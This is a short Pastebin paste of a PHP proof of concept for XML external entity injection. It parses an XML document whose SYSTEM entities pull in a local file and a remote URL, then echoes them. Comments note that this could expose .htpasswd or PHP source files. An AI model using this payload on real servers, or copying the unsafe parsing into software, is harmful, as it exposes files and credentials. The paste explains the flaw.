Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Feb 6th, 2010  |  syntax: PHP  |  size: 1.21 KB  |  views: 241  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. /*
  3.  * Place a "foo.txt" file containing random text in the directory
  4.  * containing this PHP script.
  5.  */
  6.  
  7. /*
  8.  * Wrote this in PHP, note that this "feature" is also present with
  9.  * any libxml wrapper (like lxml in Python).
  10.  *
  11.  * I do not know if other XML parsers implement that.
  12.  */
  13.  
  14. /* In real life, this may come from $_POST or an uploaded file */
  15. $document = <<<'EOF'
  16. <?xml version="1.0"?>
  17. <!DOCTYPE root [
  18. <!ENTITY robots SYSTEM "http://google.com/robots.txt">
  19. <!ENTITY foobar SYSTEM "foo.txt">
  20. ]>
  21.  
  22. <root>
  23.   &foobar;
  24.   &robots;
  25. </root>
  26. EOF;
  27.  
  28. $xml = new DOMDocument();
  29. $xml->loadXML($document);
  30.  
  31. foreach ($xml->getElementsByTagName('root') as $e)
  32.     echo $e->nodeValue;
  33.  
  34. /*
  35.  * For those who did not understand the consequences : imagine that
  36.  * you are processing XML sent by users and displaying the result back.
  37.  *
  38.  * The users now have a way to display the contents of almost any file
  39.  * accessible by the user launching the script (almost, because libxml
  40.  * implements some kind of security by disallowing any absolute URI)
  41.  * which does not contain invalid XML data. For example, a .htpasswd file,
  42.  * or simple PHP files.
  43.  *
  44.  * Also, they can make your server download porn.
  45.  */
  46. ?>
clone this paste RAW Paste Data